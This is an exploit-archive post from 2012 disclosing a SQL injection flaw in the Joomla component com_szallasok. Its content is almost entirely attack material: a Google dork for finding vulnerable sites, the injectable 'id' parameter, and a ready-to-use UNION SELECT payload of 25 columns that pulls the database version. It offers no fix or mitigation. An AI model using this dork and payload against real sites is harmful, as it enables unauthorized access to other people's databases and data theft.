Home / exploits Joomla Szallasok SQL Injection
Posted on 21 June 2012
################################################################################################ # Exploit Title: Joomla Component (com_szallasok) SQL Injection Vulnerability # # Author : CoBRa_21 # # E-Mail : cobra_21 [at] hotmail.com.tr # # Google Dork : inurl:com_szallasok # # Status : High-Risk # ################################################################################################ # # SQL Vulnerability # # http://127.0.0.1/[PATH]/index.php?option=com_szallasok&mode=8&id=25 (SQL) # # SQL Exploit # # +union+select+0,1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- # # http://localhost/index.php?option=com_szallasok&mode=8&id=-25 union select 0,1,version(),3,4, # 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 # ################################################################################################ # ( PHP Security Expert ) ################################################################################################
